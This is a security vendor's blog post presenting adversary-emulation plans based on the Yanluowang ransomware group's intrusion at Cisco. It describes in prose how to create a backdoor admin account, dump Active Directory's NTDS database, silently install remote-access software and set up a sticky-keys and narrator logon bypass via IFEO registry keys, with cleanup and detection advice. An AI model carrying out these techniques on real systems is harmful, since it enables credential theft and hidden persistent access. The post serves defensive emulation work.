Welcome to the September 2022 SCYTHE #ThreatThursday! This edition features Yanluowang emulation plans based on data from multiple sources about the Yanluowang ransomware group. We would like to especially thank Cisco Talos for their fantastic writeup on the actions taken in the network by the threat actors. We know it is always challenging for victims to share data from their incidents and this is certainly no exception. Cisco has provided a model for victim organizations in transparency around its incident, ensuring that data is shared so other victims can be more prepared.
The Yanluowang ransomware group has been around since at least late 2021, but many people had never heard their name prior to their involvement in the Cisco incident in August 2022. SCYTHE posting this threat in no way should be construed as victim blaming. On the contrary, there is sufficient data in the public domain to discuss at least in part because of the great work by Talos.
For this Threat Thursday, SCYTHE is taking a bit of a different approach. Traditionally, our ThreatThursday emulation plans are large and contain an entire attack chain. We’ve received feedback from customers that emulation plans of this size are difficult for some to operationalize. For this month’s ThreatThursday, we’ve broken the steps down into multiple plans, highlighting different components of the operation. If you want to run a complete emulation, you should consider combining the plans into a single campaign. We believe that most teams will be better served by consuming smaller (but by no means inconsequential) plans emulating Yanluowang procedures.
The plans being released with this ThreatThursday are:
Yanluowang ransomware, first discovered by Symantec, has been used in targeted attacks since at least August 2021. Some reports have suggested a link between Yanluowang and Thieflock (a RaaS developed by the Canthroid/Fivehands group) due to overlap in TTPs used. A deeper analysis of the code does not support shared authorship but instead may suggest that Yanluowang attacks could be carried out by former Thieflock affiliate groups.
Historically, use of AdFind and SoftPerfect Network Scanner have been noted as potential precursors to Yanluowang attacks. Researchers have also observed use of WMI to obtain a list of running processes on remote devices of interest, indicating some level of operational security discipline. Prior to deployment of the ransomware, PowerShell is often used to download other tools to aid in reconnaissance. Credential theft, specifically targeting those stored in browsers, is accomplished via GrabFF, GrabChrome, BrowserPassView, and KeeThief. Once Yanluowang is deployed, the malware halts all processes of interest, encrypts files on the compromised device, appends the .yanluowang extension, and drops a README.txt ransom note.
In the most recent May attack, researchers observed some additional TTPs such as:
N/A
Attacks have been heavily focused on U.S. corporations in the financial sector but companies in manufacturing, IT services, consulting, and engineering have been targeted as well.
This emulation plan creates a new backdoor user “z” and adds this user to the local administrators group. The username and password observed were sourced from the Talos reporting.
After a three minute delay (configurable), the user is deleted. The intent of the delay is to give a threat hunter time to discover the new administrative user if desired.
The first portion of the plan checks for the existence of ntdsutil.exe to ensure it is present (and in the expected path) on the system of interest.
Next, we create the directory of C:\users\public\z for the output if it doesn’t already exist.
Then, we execute ntdsutil creating a full backup and place the output in C:\users\public\z.
Then we download 7za.exe (standalone 7zip executable) and create a password protected archive of the NTDS export. Next, upload the archive to the SCYTHE server.
The cleanup steps remove the directory C:\users\public\z and other artifacts in the directory that we created.
This emulation downloads the LogMeIn.msi and performs a silent install.
We first create a staging directory “remote”:
Next we download the .msi file. *Note: download of LogMeIn is gated by requiring a user to create an account with GoTo so we have hosted the file on github.
Next we install the program using the /quiet switch:
Finally, we perform a clean up to uninstall, delete the msi, and remove the staging directory.
We begin by querying the registry to obtain the current state of certain keys which are referenced later during clean-up to restore the initial state.
Then we download a benign executable (benign.exe) that will be used as a placeholder for what would be cmd.exe in the case of the Cisco attack
.
Sethc.exe is a program under accessibility features that is responsible for the “Sticky Keys” feature in Windows and is available before login. Narrator.exe is the program responsible for the screen reading accessibility feature and is also available pre-login. By configuring a debugger under ImageFileExecutionOptions (IFEO), the debugger program is launched first when sticky keys or narrator execution is triggered. We set these registry keys, pointing them instead to our notmalware.exe, with the following commands:
We then include a step which sets a scheduled task to kill the process spawned after we execute sethc.exe. This is an artifact of the emulation and not intended to be used in detection engineering.
These steps are repeated to illustrate the same login bypass technique via use of narrator.exe instead. Clean up steps are included at the end after a 4 minute delay.
The Talos blog reported that the adversary often relied on use of PSExec to remotely add the registry values related to the IFEO logon bypass technique. Prior to running this threat please ensure you have updated the initial steps with the correct information for your environment:
The echo steps that follow are present for diagnostic purposes, ensuring the parameters used for testing are easily available in SCYTHE reporting. The “net use” command is used to validate connectivity with the intended target.
Similar to the previous threat, the registry queries that follow are used to establish baseline values which are referenced later during clean-up to restore the initial state.
After downloading PSExec, we leverage it to set the same debugger values in the registry.
Clean up steps are included at the end to restore the registry to its initial state and remove the network share connection.
There are several detection opportunities in these plans, many of which are covered by multiple rules. Where appropriate, a defense-in-depth approach should be taken by layering rules, even though one may cover the procedure in its current state.
If any of the alerts are detected in the environment, the response team should determine the depth of the Kill Chain, collect artifacts, and answer the following questions:
Once it has been determined how deep the intrusion goes, containment, eradication, and recovery should begin. After recovery, lessons learned should drive additional courses of action (COAs) to thwart the threat should it return, such as implementing additional security controls. As always, please follow your organization's response plan and evidence retention policies. We also recommend leveraging NIST SP 800-61 Rev. 2.
This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.
Kristen Cotten and Jake Williams of SCYTHE’s Advanced Emulation Services team wrote these threats. Chris Peacock performed Detection Engineering.
SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors.